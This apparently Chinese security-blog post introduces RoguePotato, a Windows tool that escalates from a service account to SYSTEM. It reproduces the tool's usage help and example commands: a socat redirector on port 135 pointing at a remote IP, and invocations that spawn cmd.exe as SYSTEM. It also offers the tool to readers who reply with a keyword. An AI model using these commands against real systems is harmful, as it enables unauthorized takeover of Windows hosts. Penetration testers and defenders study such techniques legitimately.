提权介绍
从服务帐户到系统的Windows本地权限升级
权限提升
RoguePotato@splinter_code & @decoder_itMandatory args:-r remote_ip: ip of the remote machine to use as redirector-e commandline: commandline of the program to launchOptional args:-l listening_port: This will run the RogueOxidResolver locally on the specified port-c {clsid}: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})-p pipename_placeholder: placeholder to be used in the pipe name creation (default: RoguePotato)-z : this flag will randomize the pipename_placeholder (don\\\'t use with -p)Examples:- Network redirector / port forwarder to run on your remote machine, must use port 135 as src portsocat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999- RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine. Use this if you have fw restrictions.RoguePotato.exe -r 10.0.0.3 -e \\\"C:\\\\windows\\\\system32\\\\cmd.exe\\\"- RoguePotato all in one with RogueOxidResolver running locally on port 9999RoguePotato.exe -r 10.0.0.3 -e \\\"C:\\\\windows\\\\system32\\\\cmd.exe\\\" -l 9999- RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipenameRoguePotato.exe -r 10.0.0.3 -e \\\"C:\\\\windows\\\\system32\\\\cmd.exe\\\" -l 9999 -c \\\"{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}\\\" -p splintercode
项目获取
后台回复\\”提权001\\”获取提权工具
原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34116.html